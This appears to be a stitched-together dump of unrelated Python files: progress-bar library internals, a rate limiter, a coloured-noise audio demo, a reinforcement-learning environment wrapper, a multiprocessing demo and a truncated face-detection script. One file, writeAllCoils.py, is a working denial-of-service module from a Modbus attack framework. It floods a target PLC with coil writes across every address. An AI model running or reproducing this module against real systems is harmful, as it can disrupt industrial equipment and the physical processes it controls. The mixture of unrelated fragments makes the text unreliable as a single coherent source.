... with alive_bar(123, 'Title') as bar: # <-- expected total and bar title
... for item in <iterable>:
... # process item
... bar() # makes the bar go forward
The `bar()` method should be called whenever you want the bar to go forward.
You usually call it in every iteration, but you could do it only when some
criteria match, depending on what you want to monitor.
While in a progress bar context, you have two ways to output messages:
- the usual Python `print()` statement, which will properly clean the line,
print an enriched message (including the current bar position) and
continue the bar right below it;
- the `bar.text('message')` call, which sets a situational message right within
the bar, usually to display something about the items being processed or the
phase the processing is in.
If the bar is over or underused, it will warn you!
To test all supported scenarios, you can do this:
>>> for x in 1000, 1500, 700, 0:
... with alive_bar(x) as bar:
... for i in range(1000):
... time.sleep(.005)
... bar()
Expected results are these (but you have to see them in motion!):
|████████████████████████████████████████| 1000/1000 [100%] in 6.0s (167.93/s)
|██████████████████████████▋⚠ | (!) 1000/1500 [67%] in 6.0s (167.57/s)
|████████████████████████████████████████✗ (!) 1000/700 [143%] in 6.0s (167.96/s)
|████████████████████████████████████████| 1000 in 5.8s (171.91/s)
Args:
total (Optional[int]): the total expected count
title (Optional[str]): the title, will be printed whenever there's no custom message
calibrate (int): maximum theoretical throughput to calibrate animation speed
(cannot be in the global configuration because it depends on the current mode)
**options: custom configuration options, which override the global configuration:
length (int): number of characters to render the animated progress bar
spinner (Union[str, object]): the spinner to be used in all renditions
it's a predefined name in `show_spinners()`, or a custom spinner
bar (Union[str, object]): bar to be used in definite and both manual modes
it's a predefined name in `show_bars()`, or a custom bar
unknown (Union[str, object]): bar to be used in unknown mode (whole bar is a spinner)
it's a predefined name in `show_spinners()`, or a custom spinner
theme (str): theme name in alive_progress.THEMES
force_tty (bool): runs animations even without a tty (pycharm terminal for example)
manual (bool): set to manually control percentage
enrich_print (bool): includes the bar position in print() and logging messages
title_length (int): fixed title length, or 0 for unlimited
"""
if total is not None:
if not isinstance(total, int):
raise TypeError("integer argument expected, got '{}'.".format(type(total).__name__))
if total <= 0:
total = None
config = config_handler(**options)
def run(spinner):
player = spinner_player(spinner)
while thread:
release_thread.wait()
alive_repr(next(player))
time.sleep(1. / fps())
def alive_repr(spin=''):
elapsed = time.time() - run.init
run.rate = current() / elapsed if elapsed else 0.
line = ' '.join(filter(None, (
title, bar_repr(run.percent, end), spin, monitor(), 'in',
to_elapsed_text(elapsed, end), stats(), run.text)))
line_len, cols = len(line), terminal_columns()
with print_lock:
if line_len < run.last_line_len:
clear_traces()
sys.__stdout__.write(line[:cols] + (spin and '\r' or '\n'))
sys.__stdout__.flush()
run.last_line_len = line_len
def flush_buffer():
if print_buffer:
print()
def set_text(message):
run.text = sanitize_text_marking_wide_chars(message)
if config.manual:
# FIXME update bar signatures and remove deprecated in v2.
def bar(perc=None, text=None):
"""Bar handle for manual (bounded and unbounded) modes.
Only absolute positioning.
"""
if perc is not None:
flush_buffer()
run.percent = max(0., float(perc)) # ignores negative numbers.
else:
warnings.warn(DeprecationWarning('percent will be mandatory in manual bar(),'
' please update your code.'), stacklevel=2)
update_hook()
if text is not None:
warnings.warn(DeprecationWarning("use bar.text('') instead of bar(text=''),"
' please update your code.'), stacklevel=2)
set_text(text)
return run.percent
else:
def bar(text=None, incr=1):
"""Bar handle for definite and unknown modes.
Only relative positioning.
"""
flush_buffer()
# FIXME it was accepting 0 before, so a user could be using that to change text only
run.count += max(0, int(incr)) # ignores negative numbers.
update_hook()
if text is not None:
warnings.warn(DeprecationWarning("use bar.text('') instead of bar(text=''),"
' please update your code.'), stacklevel=2)
set_text(text)
return run.count
bar.text = set_text
def print_hook(part):
if part != '\n':
# this will generate a sequence of lines interspersed with None, which will later
# be rendered as the indent filler to align additional lines under the same header.
gen = chain.from_iterable(zip(repeat(None), part.splitlines(True)))
print_buffer.extend(islice(gen, 1, None))
else:
header = header_template.format(run.count)
nested = ''.join(line or ' ' * len(header) for line in print_buffer)
with print_lock:
clear_traces()
sys.__stdout__.write('{}{}\n'.format(header, nested))
print_buffer[:] = []
print_buffer, print_lock = [], threading.Lock()
header_template = 'on {}: ' if config.enrich_print else ''
print_hook.write = print_hook
print_hook.flush = lambda: None
print_hook.isatty = sys.__stdout__.isatty
def start_monitoring(offset=0.):
hide_cursor()
sys.stdout = print_hook
run.before_handlers = install_logging_hook()
release_thread.set()
run.init = time.time() - offset
def stop_monitoring():
show_cursor()
sys.stdout = sys.__stdout__
uninstall_logging_hook(run.before_handlers) # noqa
return time.time() - run.init
thread, release_thread = None, threading.Event()
if sys.stdout.isatty() or config.force_tty:
@contextmanager
def pause_monitoring():
release_thread.clear()
offset = stop_monitoring()
alive_repr()
yield
start_monitoring(offset)
bar.pause = pause_monitoring
thread = threading.Thread(target=run, args=(config.spinner(),))
thread.daemon = True
thread.start()
if total or not config.manual: # we can count items.
logic_total, rate_spec, factor, current = total, 'f', 1.e6, lambda: run.count # noqa
else: # there's only a manual percentage.
logic_total, rate_spec, factor, current = 1., '%', 1., lambda: run.percent # noqa
if total or config.manual: # we can track progress and therefore eta.
spec = '({{:.1{}}}/s, eta: {{}})'.format(rate_spec)
gen_eta = gen_simple_exponential_smoothing_eta(.5, logic_total)
gen_eta.send(None)
stats = lambda: spec.format(run.rate, to_eta_text(gen_eta.send((current(), run.rate))))
bar_repr = config.bar(config.length)
else: # unknown progress.
bar_repr = config.unknown(config.length, config.bar)
stats = lambda: '({:.1f}/s)'.format(run.rate) # noqa
stats_end = lambda: '({:.2{}}/s)'.format(run.rate, rate_spec) # noqa
# calibration of the dynamic fps engine.
# I've started with the equation y = log10(x + m) * k + n, where:
# y is the desired fps, m and n are horizontal and vertical translation,
# k is a calibration factor, computed from some user input c (see readme for details).
# considering minfps and maxfps as given constants, I came to:
# fps = log10(x + 1) * k + minfps, which must be equal to maxfps for x = c,
# so the factor k = (maxfps - minfps) / log10(c + 1), and
# fps = log10(x + 1) * (maxfps - minfps) / log10(c + 1) + minfps
# neat! ;)
min_fps, max_fps = 2., 60.
calibrate = max(0., calibrate or factor)
adjust_log_curve = 100. / min(calibrate, 100.) # adjust curve for small numbers
factor = (max_fps - min_fps) / math.log10((calibrate * adjust_log_curve) + 1.)
def fps():
if run.rate <= 0:
return 10. # bootstrap speed
if run.rate < calibrate:
return math.log10((run.rate * adjust_log_curve) + 1.) * factor + min_fps
return max_fps
end, run.text, run.last_line_len = False, '', 0
run.count, run.percent, run.rate, run.init = 0, 0., 0., 0.
if total:
if config.manual:
def update_hook():
run.count = int(math.ceil(run.percent * total))
else:
def update_hook():
run.percent = run.count / total
monitor = lambda: '{}{}/{} [{:.0%}]'.format( # noqa
'(!) ' if end and run.count != total else '', run.count, total, run.percent
)
elif config.manual:
update_hook = lambda: None # noqa
monitor = lambda: '{}{:.0%}'.format( # noqa
'(!) ' if end and run.percent != 1. else '', run.percent
)
else:
run.percent = 1.
update_hook = lambda: None # noqa
monitor = lambda: '{}'.format(run.count) # noqa
title = render_title(title, config.title_length)
start_monitoring()
try:
yield bar
finally:
flush_buffer()
stop_monitoring()
if thread:
local_copy = thread
thread = None # lets the internal thread terminate gracefully.
local_copy.join()
end, run.text, stats = True, '', stats_end
alive_repr()
|
_sync.py
|
# -*- coding: utf-8 -*-
import time
import functools
import threading
import collections
class RateLimiter(object):
"""Provides rate limiting for an operation with a configurable number of
requests for a time period.
"""
def __init__(self, max_calls, period=1.0, callback=None):
"""Initialize a RateLimiter object which enforces as much as max_calls
operations on period (eventually floating) number of seconds.
"""
if period <= 0:
raise ValueError('Rate limiting period should be > 0')
if max_calls <= 0:
raise ValueError('Rate limiting number of calls should be > 0')
# We're using a deque to store the last execution timestamps, not for
# its maxlen attribute, but to allow constant time front removal.
self.calls = collections.deque()
self.period = period
self.max_calls = max_calls
self.callback = callback
self._lock = threading.Lock()
self._alock = None
# Lock to protect creation of self._alock
self._init_lock = threading.Lock()
def __call__(self, f):
"""The __call__ function allows the RateLimiter object to be used as a
regular function decorator.
"""
@functools.wraps(f)
def wrapped(*args, **kwargs):
with self:
return f(*args, **kwargs)
return wrapped
def __enter__(self):
with self._lock:
# We want to ensure that no more than max_calls were run in the allowed
# period. For this, we store the last timestamps of each call and run
# the rate verification upon each __enter__ call.
if len(self.calls) >= self.max_calls:
until = time.time() + self.period - self._timespan
if self.callback:
t = threading.Thread(target=self.callback, args=(until,))
t.daemon = True
t.start()
sleeptime = until - time.time()
if sleeptime > 0:
time.sleep(sleeptime)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
with self._lock:
# Store the last operation timestamp.
self.calls.append(time.time())
# Pop the timestamp list front (ie: the older calls) until the sum goes
# back below the period. This is our 'sliding period' window.
while self._timespan >= self.period:
self.calls.popleft()
@property
def _timespan(self):
return self.calls[-1] - self.calls[0]
|
noise_color_demo.py
|
import matplotlib.pyplot as plt
import numpy as np
import scipy as sc
import sounddevice as sd
def generate_signal_from_spectrum(C_k: np.ndarray)-> np.ndarray:
"""
generates a real valued time domain signal from frequency coefficients for ifft. Signal is aprox. scaled to ~[-1;1].
:param C_k: np.ndarray, dtype='float', one dimension: frequency coefficients, two sided. Which index is representing
which frequency is like in scipy.fft.fftfreq
:return: np.ndarray, dtype='float': time domain signal ~[-1;1] according to specified C_k
"""
length = C_k.shape[0]
# generate uniform distributed phase values to get real valued signal
phi_k = np.random.uniform(0, 2 * np.pi, length)
# calculate complex coefficients to get real signal
C_k_complex = np.ndarray(length, dtype="complex")
for k in range(-((length // 2)+1), (length // 2)):
C_k_complex[k] = C_k[k] * np.exp(1j * phi_k[k] * k)
# get signal by inverse fft, take only the the real part
signal = sc.fft.ifft(C_k_complex).real
# normalise signal
return signal / max(np.abs(signal.min()), signal.max())
def generate_pink_noise(duration: float, f_sample: float) -> np.ndarray:
"""
generates a real valued time domain signal of pink noise. Signal is aprox. scaled to ~[-1;1].
:param duration: duration the noise signal should have in seconds
:param f_sample: sample frequency, determines the frequency/time resolution
:return: np.ndarray, dtype='float': real valued time domain signal ~[-1;1] of pink noise
"""
# calculate the number of time points and the time difference between them
length = duration * f_sample
delta_t = 1 / f_sample
# get the angular frequency axis in [omega]
f_k = sc.fft.fftfreq(length, d=delta_t)/(2 * np.pi)
# calculate the frequency coefficients based on the noise color
# pink noise has power spectral density of 1/f -> the amplitude has 1/sqrt(f)
C_k = np.ndarray(length)
C_k[1:] = 1 / np.sqrt(np.abs(f_k[1:]))
# no dc
C_k[0] = 0
# generate the signal from the frequency coefficients
return generate_signal_from_spectrum(C_k)
def generate_brown_noise(duration: float, f_sample: float) -> np.ndarray:
"""
generates a real valued time domain signal of brown/red noise. Signal is aprox. scaled to ~[-1;1].
:param duration: duration the noise signal should have in seconds
:param f_sample: sample frequency, determines the frequency/time resolution
:return: np.ndarray, dtype='float': real valued time domain signal ~[-1;1] of brown/red noise
"""
# calculate the number of time points and the time difference between them
length = duration * f_sample
delta_t = 1 / f_sample
# get the angular frequency axis in [omega]
# calculate the frequency coefficients based on the noise color
# brown/red noise has power spectral density of 1/(f**2) -> the amplitude has 1/f
f_k = sc.fft.fftfreq(length, d=delta_t) / (2 * np.pi)
C_k = np.ndarray(length)
C_k[1:] = 1 / np.abs(f_k[1:])
# no dc
C_k[0] = 0
# generate the signal from the frequency coefficients
return generate_signal_from_spectrum(C_k)
def generate_infrared_noise(duration: float, f_sample: float) -> np.ndarray:
"""
generates a real valued time domain signal of 'infrared' noise. Signal is aprox. scaled to ~[-1;1].
:param duration: duration the noise signal should have in seconds
:param f_sample: sample frequency, determines the frequency/time resolution
:return: np.ndarray, dtype='float': real valued time domain signal ~[-1;1] of 'infrared' noise
"""
# calculate the number of time points and the time difference between them
length = duration * f_sample
delta_t = 1 / f_sample
# get the angular frequency axis in [omega]
# calculate the frequency coefficients based on the noise color
# 'infrared' noise has power spectral density of 1/(f**4) -> the amplitude has 1/(f**2)
f_k = sc.fft.fftfreq(length, d=delta_t) / (2 * np.pi)
C_k = np.ndarray(length)
C_k[1:] = 1 / (np.abs(f_k[1:])**2)
# no dc
C_k[0] = 0
# generate the signal from the frequency coefficients
return generate_signal_from_spectrum(C_k)
def generate_white_noise(duration: float, f_sample: float) -> np.ndarray:
"""
generates a real valued time domain signal of white noise. Signal is aprox. scaled to ~[-1;1].
:param duration: duration the noise signal should have in seconds
:param f_sample: sample frequency, determines the frequency/time resolution
:return: np.ndarray, dtype='float': real valued time domain signal ~[-1;1] of white noise
"""
# calculate the number of time points and the time difference between them
length = duration * f_sample
delta_t = 1 / f_sample
# calculate the frequency coefficients based on the noise color
# white noise has constant power spectral density over the frequency
C_k = np.ones(length)
# no dc
C_k[0] = 0
# generate the signal from the frequency coefficients
return generate_signal_from_spectrum(C_k)
# sampling frequency
fs = 44500 # < [Hz]
# duration of signal
dur_signal = 3 # < [s]
# length of the time domain signal displayed
dur_snipped = 2# < [s]
# calculate the number of points
signal_len = int(fs * dur_signal)
snipped_len = int(fs * dur_snipped)
# set up the plot
fig = plt.figure(figsize=[15, 7])
sub = fig.subplots(1, 2)
# first generate, plot and play pink white
noise_color = "white"
sub[0].clear()
sub[0].set_title(f"{noise_color} noise: time domain signal")
sub[0].set_xlabel("time(s)")
sub[0].set_ylabel("amplitude")
sub[1].clear()
sub[1].set_title(f"{noise_color} noise: frequency domain signal")
sub[1].set_ylabel("power [dB]")
sub[1].set_xlabel("frequency [Hz]")
sub[1].set_xscale('log')
noise_signal = generate_white_noise(dur_signal, fs)
# time domain subplot with duration of {dur_snipped}
sub[0].plot([i / fs for i in range(snipped_len)], noise_signal[:int(dur_snipped * fs)])
# calculate the power spectral density of the noise
# calculate the fft of the signal
noise_psd = sc.fft.fft(noise_signal)
# only take the positive half side and only the amount of the complex values
noise_psd = np.abs(noise_psd[:signal_len // 2])
# calculate the decibel value psd[dB] = 10* log10(amplitude[lin]**2) = 20* log10(amplitude[lin])
noise_psd = 20 * np.log10(noise_psd)
sub[1].plot(np.linspace(0, fs/2, signal_len//2)[1:], noise_psd[1:])
# bg_thread = threading.Thread(target=background_task, args=[noise_signal, fs])
# bg_thread.start()
plt.show()
plt.pause(0.1)
# bg_thread.join()
# plot_thread = multiprocessing.Process(target=plot_task, args=[noise_color, noise_signal, noise_psd])
# plot_thread.start()
while True:
ans = input("for playing the noise sound press p, for coniuing to the next noise press c")
if len(ans) == 1:
if ans.count("c") != 0:
break
if ans.count("p") != 0:
sd.play(noise_signal, fs)
# pink noise
noise_color = "pink"
sub[0].clear()
sub[0].set_title(f"{noise_color} noise: time domain signal")
sub[0].set_xlabel("time(s)")
sub[0].set_ylabel("amplitude")
sub[1].clear()
sub[1].set_title(f"{noise_color} noise: frequency domain signal")
sub[1].set_ylabel("power [dB]")
sub[1].set_xlabel("frequency [Hz]")
sub[1].set_xscale('log')
noise_signal = generate_pink_noise(dur_signal, fs)
# time domain subplot with duration of {dur_snipped}
sub[0].plot([i / fs for i in range(snipped_len)], noise_signal[:int(dur_snipped * fs)])
# calculate the power spectral density of the noise
# calculate the fft of the signal
noise_psd = sc.fft.fft(noise_signal)
# only take the positive half side and only the amount of the complex values
noise_psd = np.abs(noise_psd[:signal_len // 2])
# calculate the decibel value psd[dB] = 10* log10(amplitude[lin]**2) = 20* log10(amplitude[lin])
noise_psd = 20 * np.log10(noise_psd)
sub[1].plot(np.linspace(0, fs/2, signal_len//2)[1:], noise_psd[1:])
plt.show()
plt.pause(0.1)
while True:
ans = input("for playing the noise sound press p, for coniuing to the next noise press c")
if len(ans) == 1:
if ans.count("c") != 0:
break
if ans.count("p") != 0:
sd.play(noise_signal, fs)
# brown noise
noise_color = "brown"
sub[0].clear()
sub[0].set_title(f"{noise_color} noise: time domain signal")
sub[0].set_xlabel("time(s)")
sub[0].set_ylabel("amplitude")
sub[1].clear()
sub[1].set_title(f"{noise_color} noise: frequency domain signal")
sub[1].set_ylabel("power [dB]")
sub[1].set_xlabel("frequency [Hz]")
sub[1].set_xscale('log')
noise_signal = generate_brown_noise(dur_signal, fs)
# time domain subplot with duration of {dur_snipped}
sub[0].plot([i / fs for i in range(snipped_len)], noise_signal[:int(dur_snipped * fs)])
# calculate the power spectral density of the noise
# calculate the fft of the signal
noise_psd = sc.fft.fft(noise_signal)
# only take the positive half side and only the amount of the complex values
noise_psd = np.abs(noise_psd[:signal_len // 2])
# calculate the decibel value psd[dB] = 10* log10(amplitude[lin]**2) = 20* log10(amplitude[lin])
noise_psd = 20 * np.log10(noise_psd)
sub[1].plot(np.linspace(0, fs/2, signal_len//2)[1:], noise_psd[1:])
plt.show(block=False)
plt.pause(0.1)
while True:
ans = input("for playing the noise sound press p, for coniuing to the next noise press c")
if len(ans) == 1:
if ans.count("c") != 0:
break
if ans.count("p") != 0:
sd.play(noise_signal, fs)
# brown noise
noise_color = "infrared"
sub[0].clear()
sub[0].set_title(f"{noise_color} noise: time domain signal")
sub[0].set_xlabel("time(s)")
sub[0].set_ylabel("amplitude")
sub[1].clear()
sub[1].set_title(f"{noise_color} noise: frequency domain signal")
sub[1].set_ylabel("power [dB]")
sub[1].set_xlabel("frequency [Hz]")
sub[1].set_xscale('log')
noise_signal = generate_infrared_noise(dur_signal, fs)
# time domain subplot with duration of {dur_snipped}
sub[0].plot([i / fs for i in range(snipped_len)], noise_signal[:int(dur_snipped * fs)])
# calculate the power spectral density of the noise
# calculate the fft of the signal
noise_psd = sc.fft.fft(noise_signal)
# only take the positive half side and only the amount of the complex values
noise_psd = np.abs(noise_psd[:signal_len // 2])
# calculate the decibel value psd[dB] = 10* log10(amplitude[lin]**2) = 20* log10(amplitude[lin])
noise_psd = 20 * np.log10(noise_psd)
sub[1].plot(np.linspace(0, fs/2, signal_len//2)[1:], noise_psd[1:])
plt.show(block=False)
plt.pause(0.1)
while True:
ans = input("for playing the noise sound press p, for coniuing to the next noise press c")
if len(ans) == 1:
if ans.count("c") != 0:
break
if ans.count("p") != 0:
sd.play(noise_signal, fs)
|
writeAllCoils.py
|
import os
import threading
import random
from System.Core.Global import *
from System.Core.Colors import *
from System.Core.Modbus import *
from System.Lib import ipcalc
down = False
class Module:
info = {
'Name': 'DOS Write All Coils',
'Author': ['@enddo'],
'Description': ("DOS With Write All Coils"),
}
options = {
'RHOST' :['' ,True ,'The target IP address'],
'RPORT' :[502 ,False ,'The port number for modbus protocol'],
'UID' :['' ,True ,'Modbus Slave UID.'],
'Threads' :[1 ,False ,'The number of concurrent threads'],
'Output' :[False ,False ,'The stdout save in output directory']
}
output = ''
def exploit(self):
moduleName = self.info['Name']
print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start'
for i in range(int(self.options['Threads'][0])):
if(self.options['RHOST'][0]):
thread = threading.Thread(target=self.do,args=(self.options['RHOST'][0],))
thread.start()
THREADS.append(thread)
else:
break
if(down):
break
for thread in THREADS:
thread.join()
if(down):
self.printLine('[-] Modbus is not running on : ' + self.options['RHOST'][0],bcolors.WARNING)
if(self.options['Output'][0]):
open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOST'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n')
self.output = ''
def printLine(self,str,color):
self.output += str + '\n'
if(str.find('[+]') != -1):
print str.replace('[+]',color + '[+]' + bcolors.ENDC)
elif(str.find('[-]') != -1):
print str.replace('[-]',color + '[+]' + bcolors.ENDC)
else:
print str
def do(self,ip):
global down
if(down == True):
return None
for i in range(0xffff):
c = connectToTarget(ip,self.options['RPORT'][0])
if(c == None):
down = True
return None
try:
self.printLine('[+] Write on Address ' + str(int(hex(i|0x1111),16)),bcolors.OKGREEN)
ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU05_Write_Single_Coil(outputAddr=int(hex(i|0x1111),16),outputValue=int('0x0000',16)),timeout=timeout, verbose=0)
ans = ModbusADU_Answer(str(ans))
self.printLine('[+] Response is :',bcolors.OKGREEN)
ans.show()
except:
pass
|
task.py
|
#######################################################################
# Copyright (C) 2017 Shangtong Zhang(zhangshangtong.cpp@gmail.com) #
# Permission given to modify the code as long as you keep this #
# declaration at the top #
#######################################################################
import gym
import gym_cartpolemod
import sys
import numpy as np
from .atari_wrapper import *
import multiprocessing as mp
import sys
from .bench import Monitor
from utils import *
class BasicTask:
def __init__(self, max_steps=sys.maxsize):
self.steps = 0
self.max_steps = max_steps
def reset(self):
self.steps = 0
state = self.env.reset()
return state
def normalize_state(self, state):
return state
def step(self, action):
next_state, reward, done, info = self.env.step(action)
self.steps += 1
done = (done or self.steps >= self.max_steps)
return next_state, reward, done, info
def random_action(self):
return self.env.action_space.sample()
def set_monitor(self, filename):
self.env = Monitor(self.env, filename)
class ClassicalControl(BasicTask):
def __init__(self, name='CartPole-v0', max_steps=200):
BasicTask.__init__(self, max_steps)
self.name = name
self.env = gym.make(self.name)
self.env._max_episode_steps = sys.maxsize
self.action_dim = self.env.action_space.n
self.state_dim = self.env.observation_space.shape[0]
class LunarLander(BasicTask):
name = 'LunarLander-v2'
success_threshold = 200
def __init__(self, max_steps=sys.maxsize):
BasicTask.__init__(self, max_steps)
self.env = gym.make(self.name)
self.action_dim = self.env.action_space.n
self.state_dim = self.env.observation_space.shape[0]
class PixelAtari(BasicTask):
def __init__(self, name, no_op, frame_skip, normalized_state=True,
frame_size=84, max_steps=10000, history_length=1):
BasicTask.__init__(self, max_steps)
self.normalized_state = normalized_state
self.name = name
env = gym.make(name)
assert 'NoFrameskip' in env.spec.id
env = EpisodicLifeEnv(env)
env = NoopResetEnv(env, noop_max=no_op)
env = MaxAndSkipEnv(env, skip=frame_skip)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
env = ProcessFrame(env, frame_size)
if normalized_state:
env = NormalizeFrame(env)
self.env = StackFrame(env, history_length)
self.action_dim = self.env.action_space.n
def normalize_state(self, state):
return np.asarray(state) / 255.0
class RamAtari(BasicTask):
def __init__(self, name, no_op, frame_skip, max_steps=10000):
BasicTask.__init__(self, max_steps)
self.name = name
env = gym.make(name)
assert 'NoFrameskip' in env.spec.id
env = EpisodicLifeEnv(env)
env = NoopResetEnv(env, noop_max=no_op)
env = SkipEnv(env, skip=frame_skip)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
self.env = env
self.action_dim = self.env.action_space.n
def normalize_state(self, state):
return np.asarray(state) / 255.0
class ContinuousMountainCar(BasicTask):
name = 'MountainCarContinuous-v0'
success_threshold = 90
def __init__(self, max_steps=sys.maxsize):
BasicTask.__init__(self, max_steps)
self.env = gym.make(self.name)
self.max_episode_steps = self.env._max_episode_steps
self.env._max_episode_steps = sys.maxsize
self.action_dim = self.env.action_space.shape[0]
self.state_dim = self.env.observation_space.shape[0]
class Pendulum(BasicTask):
name = 'Pendulum-v0'
success_threshold = -10
def __init__(self, max_steps=sys.maxsize):
BasicTask.__init__(self, max_steps)
self.env = gym.make(self.name)
self.action_dim = self.env.action_space.shape[0]
self.state_dim = self.env.observation_space.shape[0]
def step(self, action):
return BasicTask.step(self, np.clip(action, -2, 2))
class Box2DContinuous(BasicTask):
def __init__(self, name, max_steps=sys.maxsize):
BasicTask.__init__(self, max_steps)
self.name = name
self.env = gym.make(self.name)
self.action_dim = self.env.action_space.shape[0]
self.state_dim = self.env.observation_space.shape[0]
def step(self, action):
return BasicTask.step(self, np.clip(action, -1, 1))
class Roboschool(BasicTask):
def __init__(self, name, success_threshold=sys.maxsize, max_steps=sys.maxsize):
import roboschool
BasicTask.__init__(self, max_steps)
self.name = name
self.env = gym.make(self.name)
self.action_dim = self.env.action_space.shape[0]
self.state_dim = self.env.observation_space.shape[0]
def step(self, action):
return BasicTask.step(self, np.clip(action, -1, 1))
def sub_task(parent_pipe, pipe, task_fn, filename=None):
parent_pipe.close()
task = task_fn()
if filename is not None:
task.set_monitor(filename)
task.env.seed(np.random.randint(0, sys.maxsize))
while True:
op, data = pipe.recv()
if op == 'step':
pipe.send(task.step(data))
elif op == 'reset':
pipe.send(task.reset())
elif op == 'exit':
pipe.close()
return
else:
assert False, 'Unknown Operation'
class ParallelizedTask:
def __init__(self, task_fn, num_workers, tag='vanilla'):
self.task_fn = task_fn
self.task = task_fn()
self.name = self.task.name
# date = datetime.datetime.now().strftime("%I:%M%p-on-%B-%d-%Y")
mkdir('./log/%s-%s' % (self.name, tag))
filenames = ['./log/%s-%s/worker-%d' % (self.name, tag, i)
for i in range(num_workers)]
self.pipes, worker_pipes = zip(*[mp.Pipe() for _ in range(num_workers)])
args = [(p, wp, task_fn, filename)
for p, wp, filename in zip(self.pipes, worker_pipes, filenames)]
self.workers = [mp.Process(target=sub_task, args=arg) for arg in args]
for p in self.workers: p.start()
for p in worker_pipes: p.close()
self.observation_space = self.task.env.observation_space
self.action_space = self.task.env.action_space
def step(self, actions):
for pipe, action in zip(self.pipes, actions):
pipe.send(('step', action))
results = [p.recv() for p in self.pipes]
results = map(lambda x: np.stack(x), zip(*results))
return results
def reset(self, i=None):
if i is None:
for pipe in self.pipes:
pipe.send(('reset', None))
results = [p.recv() for p in self.pipes]
else:
self.pipes[i].send(('reset', None))
results = self.pipes[i].recv()
return np.stack(results)
def close(self):
for pipe in self.pipes:
pipe.send(('exit', None))
for p in self.workers: p.join()
|
multiprocess.py
|
from multiprocessing import Process
import os
# 子进程要执行的代码
def run_proc(name):
print('Run child process %s (%s)...' % (name, os.getpid()))
while 1:
pass
if __name__=='__main__':
print('Parent process %s.' % os.getpid())
p = Process(target=run_proc, args=('test',))
p.start()
#p.join()
p = Process(target=run_proc, args=('test',))
p.start()
p = Process(target=run_proc, args=('test',))
p.start()
#print('Child process end.')
|
demo_single_scale.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import _init_paths
import caffe
import cv2
import numpy as np
from python_wrapper import *
import os
from timeit import default_timer as timer
from picamera.array import PiRGBArray
from picamera import PiCamera
from threading import Thread
import imutils
from imutils.video import FPS
class PiVideoStream:
def __init__(self,resolution=(352,240),framerate=32):
#initialize the camera and the stream
self.camera = PiCamera()
self.camera.resolution =resolution
self.camera.framerate = framerate
self.rawCapture = PiRGBArray(self.camera, size=resolution)
self.stream = self.camera.capture_continuous(self.rawCapture, format="bgr", use_video_port = True)
#initialize the frame and teh variable used to indicate if the thread should be stopped
self.frame = None
self.stopped = False
def start(self):
#start the thread to read frames from the video stream
Thread(target=self.update,args=()).start()
return self
def update(self):
#keep looping infinitely until the thread is stopped
for f in self.stream:
#grab the fram from the stream and clear the stream in preparation for the next frame
self.frame = f.array
self.rawCapture.truncate(0)
#if the thread indicator variable is set, stop the thread and camera resources
if self.stopped:
self.stream.close()
self.rawCapture.close()
self.camera.close()
return
def read(self):
#return the frame most recently read
return self.frame
def stop(self):
#indicate that the thread should be stopped
self.stopped = True
def bbreg(boundingbox, reg):
reg = reg.T
# calibrate bouding boxes
if reg.shape[1] == 1:
print("reshape of reg")
pass # reshape of reg
w = boundingbox[:,2] - boundingbox[:,0] + 1
h = boundingbox[:,3] - boundingbox[:,1] + 1
bb0 = boundingbox[:,0] + reg[:,0]*w
bb1 = boundingbox[:,1] + reg[:,1]*h
bb2 = boundingbox[:,2] + reg[:,2]*w
bb3 = boundingbox[:,3] + reg[:,3]*h
boundingbox[:,0:4] = np.array([bb0, bb1, bb2, bb3]).T
#print "bb", boundingbox
return boundingbox
def pad(boxesA, w, h):
boxes = boxesA.copy() # shit, value parameter!!!
#print '#################'
#print 'boxes', boxes
#print 'w,h', w, h
tmph = boxes[:,3] - boxes[:,1] + 1
tmpw = boxes[:,2] - boxes[:,0] + 1
numbox = boxes.shape[0]
#print 'tmph', tmph
#print 'tmpw', tmpw
dx = np.ones(numbox)
dy = np.ones(numbox)
edx = tmpw
edy = tmph
x = boxes[:,0:1][:,0]
y = boxes[:,1:2][:,0]
ex = boxes[:,2:3][:,0]
ey = boxes[:,3:4][:,0]
tmp = np.where(ex > w)[0]
if tmp.shape[0] != 0:
edx[tmp] = -ex[tmp] + w-1 + tmpw[tmp]
ex[tmp] = w-1
tmp = np.where(ey > h)[0]
if tmp.shape[0] != 0:
edy[tmp] = -ey[tmp] + h-1 + tmph[tmp]
ey[tmp] = h-1
tmp = np.where(x < 1)[0]
if tmp.shape[0] != 0:
dx[tmp] = 2 - x[tmp]
x[tmp] = np.ones_like(x[tmp])
tmp = np.where(y < 1)[0]
if tmp.shape[0] != 0:
dy[tmp] = 2 - y[tmp]
y[tmp] = np.ones_like(y[tmp])
# for python index from 0, while matlab from 1
dy = np.maximum(0, dy-1)
dx = np.maximum(0, dx-1)
y = np.maximum(0, y-1)
x = np.maximum(0, x-1)
edy = np.maximum(0, edy-1)
edx = np.maximum(0, edx-1)
ey = np.maximum(0, ey-1)
ex = np.maximum(0, ex-1)
#print "dy" ,dy
#print "dx" ,dx
#print "y " ,y
#print "x " ,x
#print "edy" ,edy
#print "edx" ,edx
#print "ey" ,ey
#print "ex" ,ex
#print 'boxes', boxes
return [dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph]
def rerec(bboxA):
# convert bboxA to square
w = bboxA[:,2] - bboxA[:,0]
h = bboxA[:,3] - bboxA[:,1]
l = np.maximum(w,h).T
#print 'bboxA', bboxA
#print 'w', w
#print 'h', h
#print 'l', l
bboxA[:,0] = bboxA[:,0] + w*0.5 - l*0.5
bboxA[:,1] = bboxA[:,1] + h*0.5 - l*0.5
bboxA[:,2:4] = bboxA[:,0:2] + np.repeat([l], 2, axis = 0).T
return bboxA
def nms(boxes, threshold, type):
"""nms
:boxes: [:,0:5]
:threshold: 0.5 like
:type: 'Min' or others
:returns: TODO
"""
if boxes.shape[0] == 0:
return np.array([])
x1 = boxes[:,0]
y1 = boxes[:,1]
x2 = boxes[:,2]
y2 = boxes[:,3]
s = boxes[:,4]
area = np.multiply(x2-x1+1, y2-y1+1)
I = np.array(s.argsort()) # read s using I
pick = [];
while len(I) > 0:
